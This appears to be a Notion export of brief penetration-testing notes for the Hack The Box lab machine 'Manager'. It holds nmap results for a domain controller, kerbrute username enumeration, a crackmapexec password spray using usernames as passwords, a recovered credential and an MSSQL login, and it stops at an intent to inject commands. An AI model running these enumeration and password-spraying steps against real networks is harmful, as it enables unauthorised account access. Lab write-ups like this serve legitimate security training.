Manager | Notion

53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
49667/tcp open  unknown
49691/tcp open  unknown
49693/tcp open  unknown
49695/tcp open  unknown
49707/tcp open  unknown

53,80,88,135,139,445,464,593,1433,3268,3269,5985,49667,49691,49693,49695,49707

Untitled

echo "10.129.42.4 manager.htb dc.manager.htb" >> /etc/hosts

Untitled

All unaccessible

kerbrute userenum -d manager.htb --dc dc.manager.htb /opt/useful/SecLists/Usernames/xato-net-10-million-usernames.txt >>users

Untitled

cat users | grep VALID | awk -F '@' '{print $1}'| awk -F ':' '{print $4}' | tr -d '\\t ' >> userlist

crackmapexec smb manager.htb -u userlist  -p userlist

Untitled

get a smb credential

operator:operator

try to connect mssql

mssqlclient.py -port 1433 manager.htb/operator:[email protected] -windows-auth

Untitled

try to inject commands